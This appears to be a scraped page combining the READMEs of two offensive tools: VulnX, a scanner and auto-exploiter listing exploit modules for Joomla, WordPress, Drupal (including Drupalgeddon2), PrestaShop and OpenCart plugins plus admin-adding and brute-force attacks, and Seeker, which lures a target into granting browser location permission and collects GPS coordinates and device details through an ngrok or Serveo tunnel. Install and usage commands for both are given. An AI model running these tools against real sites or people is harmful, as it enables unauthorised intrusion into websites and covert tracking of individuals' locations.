• Com Foxcontact
• Com Blog
• Com Users
• Com Ads Manager
• Com Sexycontactform
• Com Media
• Mod_simplefileupload
• Com Facileforms
• Com Facileforms
• Com extplorer

• Simple Ads Manager
• InBoundio Marketing
• WPshop eCommerce
• Synoptic
• Showbiz Pro
• Job Manager
• Formcraft
• PowerZoom
• Download Manager
• CherryFramework
• Catpro
• Blaze SlideShow
• Wysija-Newsletters

• Add Admin
• Drupal BruteForcer
• Drupal Geddon2

• attributewizardpro
• columnadverts
• soopamobile
• pk_flexmenu
• pk_vertflexmenu
• nvn_export_orders
• megamenu
• tdpsthemeoptionpanel
• psmodthemeoptionpanel
• masseditproduct
• blocktestimonial
• soopabanners
• Vtermslideshow
• simpleslideshow
• productpageadverts
• homepageadvertise
• homepageadvertise2
• jro_homepageadvertise
• advancedslider
• cartabandonmentpro
• cartabandonmentproOld
• videostab
• wg24themeadministration
• fieldvmegamenu
• wdoptionpanel

• Opencart BruteForce

usage: vulnx [options]

  -u --url              url target
  -D --dorks            search webs with dorks
  -o --output           specify output directory
  -t --timeout          http requests timeout
  -c --cms-info         search cms info[themes,plugins,user,version..]
  -e --exploit          searching vulnerability& run exploits
  -w --web-info         web informations gathering
  -d --domain-info      subdomains informations gathering
  -l, --dork-list       list names of dorks exploits
  -n, --number-page     number page of search engine(Google)
  -p, --ports           ports to scan
  -i, --input           specify domains to scan from an input file 
  --threads             number of threads
  --dns                 dns informations gathering

$ git clone https://github.com/anouarbensaad/VulnX.git
$ cd VulnX
$ docker build -t vulnx ./docker/
$ docker run -it --name vulnx vulnx:latest -u http://example.com

$ docker run -it --name vulnx -v "$PWD/logs:/VulnX/logs" vulnx:latest -u http://example.com

VOLUME [ "$PATH" ]

$ git clone https://github.com/anouarbensaad/vulnx.git
$ cd VulnX
$ chmod +x install.sh
$ ./install.sh

$ pkg update
$ pkg install -y git
$ git clone http://github.com/anouarbensaad/vulnx
$ cd vulnx
$ chmod +x install.sh
$ ./install.sh

• click here to download vulnx
• download and install python3
• unzip vulnx-master.zip in c:/
• open the command prompt cmd.

> cd c:/vulnx-master
> python vulnx.py

• v1.9
• v1.8
• v1.7
• v1.6
• v1.5
• v1.4
• v1.3
• v1.2
• v1.1

• Longitude
• Latitude
• Accuracy
• Altitude - Not always available
• Direction - Only available if user is moving
• Speed - Only available if user is moving

• Operating System
• Platform
• Number of CPU Cores
• Amount of RAM - Approximate Results
• Screen Resolution
• GPU information
• Browser Name and Version
• Public IP Address
• IP Address Reconnaissance

• Other tools and services offer IP Geolocation which is NOT accurate at all and does not give location of the target instead it is the approximate location of the ISP.
  
• Seeker uses HTML API and gets Location Permission and then grabs Longitude and Latitude using GPS Hardware which is present in the device, so Seeker works best with Smartphones, if the GPS Hardware is not present, such as on a Laptop, Seeker fallbacks to IP Geolocation or it will look for Cached Coordinates.
  
• Generally if a user accepts location permsission, Accuracy of the information recieved is accurate to approximately 30 meters, Accuracy Depends on the Device.
  

• Kali Linux 2019.2
• BlackArch Linux
• Ubuntu 19.04
• Kali Nethunter
• Termux
• Parrot OS

git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod 777 install.sh
./install.sh

pacman -S seeker

# Install docker

curl -fsSL https://get.docker.com -o get-docker.sh
sh get-docker.sh

# Build Seeker

cd seeker/
docker build -t seeker .

# Launch seeker

docker run -t --rm seeker

# OR Pull from DockerHub

docker pull thewhiteh4t/seeker
docker run -t seeker

git clone https://github.com/thewhiteh4t/seeker.git
cd seeker/
chmod 777 termux_install.sh
./termux_install.sh

python3 seeker.py -h

usage: seeker.py [-h] [-s SUBDOMAIN]

optional arguments:
  -h, --help                              show this help message and exit
  -s SUBDOMAIN, --subdomain Subdomain    Provide Subdomain for Serveo URL ( Optional )
  -k KML, --kml KML                       Provide KML Filename ( Optional )
  -t TUNNEL, --tunnel TUNNEL              Specify Tunnel Mode [manual]

# Example

# SERVEO 
########
python3 seeker.py

# NGROK ETC.
############

# In First Terminal Start seeker in Manual mode like this
python3 seeker.py -t manual

# In Second Terminal Start Ngrok or any other tunnel service on port 8080
./ngrok http 8080

#-----------------------------------#

# Subdomain
########### 
python3 seeker.py --subdomain google
python3 seeker.py --   tunnel manual --subdomain zomato

• Services like Serveo and Ngrok are banned in some countries such as Russia etc., so if it's banned in your country you may not get a URL, if not then first READ CLOSED ISSUES, if your problem is not listed, create a new issue.